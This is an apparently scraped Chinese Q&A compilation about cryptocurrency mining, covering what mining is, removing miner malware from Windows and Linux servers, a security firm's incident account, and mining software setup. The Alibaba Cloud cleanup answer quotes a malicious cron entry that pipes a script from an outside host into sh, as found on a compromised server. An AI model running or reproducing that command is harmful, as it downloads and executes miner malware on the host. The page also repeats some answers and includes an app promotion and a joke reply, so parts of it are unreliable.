系统让我去挖矿

A. 电脑上面说的挖矿是什么意思

挖矿：即比特币挖矿，是一种利用电脑硬件计算出比特币的位置并获取的过程。

B. 电脑被svchost.exe挖矿怎么办

这个svchost.exe是系统程序，所有的系统服务都有依靠它来运行的，根本就不能删掉的（即使删了你的系统也就崩溃了），所以需要你检查控制面板，管理工具，服务，看看服务中有什么可疑的内容没有。

C. 我看到网上经常说“挖矿”赚钱， 怎么挖啊我现在只有电脑和手机，能挖吗我下岗了，想挖矿试试

洗洗睡吧，把手机和电脑卖了，去路边炒粉挣钱

D. 电脑上面说的挖矿是什么意思

挖矿：即比特币挖矿，是一种利用电脑硬件计算出比特币的位置并获取的过程。

E. 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

F. 什么是挖矿，真的能赚钱吗，我来告诉你

挖矿是将一段时间内比特币系统中发生的交易进行确认,并记录在区块链上形成新区块的过程,挖矿的人叫做矿工。

挖矿能赚钱吗？周围接触过区块链的人都问过我这个问题。答案肯定是能，不然挖矿也不会作为区块链发展的根基，无数的人去做矿工！

那怎么挖？小白用户表示一头雾水。可以用哈鱼矿工挖矿，亲身体验下挖抗，主要是下载软件，一键就能挖矿，没有任何学习成本！

G. 我网上买了一个重装系统U盘，重装系统之后电脑里有一个恶意挖矿软件，请问把这个卸载了就可以了吗

直接卸载是不行的，建议“开始”-“运行”，输入：regedit，打开windows注册表，点击上方：“编辑”-“查找”（不要勾选全字匹配，其他都勾上），输入内容：lovecloud，然后将注册表中所有与该内容有关的找出，全部删掉。
你卸载掉该恶意软件，同时在注册表中搜不出任何与lovecloud有关的项，才能确定删除干净了。

H. 为什么我去挖矿系统显示要70级，我已经70级而且学了大师采金

仔细看看 是要求70还是71=。=新出的矿要求是71吧。。。 如果真的是要求70你到70了挖不了，就提交BUG呗。。。

I. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

J. 什么是挖矿

挖矿就是利用比特币挖矿机，就是用于赚取比特币。

用户用个人计算机下载软件然后运行特定算法，与远方服务器通讯后可得到相应比特币，是获取比特币的方式之一。

比特币为一种虚拟的货币，比特币挖矿制度为通过计算机硬件为比特币网络开展数学运算的过程，提供服务的矿工可以得到一笔报酬，因为网络报酬依据矿工完成的任务来计算，为此挖矿的竞争十分激烈。

挖矿实际是性能的竞争、装备的竞争，由非常多张显卡组成的挖矿机，哪怕只是HD6770这种中低端显卡，“组团”之后的运算能力还是能够超越大部分用户的单张显卡的。

而且这还不是最可怕的，有些挖矿机是更多这样的显卡阵列组成的，数十乃至过百的显卡一起来，显卡本身也是要钱的，算上硬件价格等各种成本，挖矿存在相当大的支出。

(10)系统让我去挖矿扩展阅读：

比特币挖矿流程：

1、找到矿池

开始挖矿必须要有一个操作方便、产出稳定的矿池，它的作用就是为各个终端细分数据包，可以通过精密的算法将终端计算好的数据包按照比例，支付相应数量的比特币。

2、下载比特币挖矿器（软件）

其实这种挖矿器也有很多种，大家可以去官方网站下载。

3、设置挖矿软件

GUIMiner是个绿色软件，安装完成后我们可以先设置下语言，以便更方便进一步设置。接下来需要对采矿器设置服务器、用户名、密码、设备等。一般服务器从BTC guild系列里面选一个网络较好的就行，用户名和密码就是我们之前自己设置的。

4、比特币挖矿开始

当我们确认都设定无误后，点“开始挖矿”按钮之后就开始挖比特币了，随之显卡很快就会进入全速运行状态，温度升高、风扇转速提高，你可以通过GPU-Z或显卡驱动来监控状态。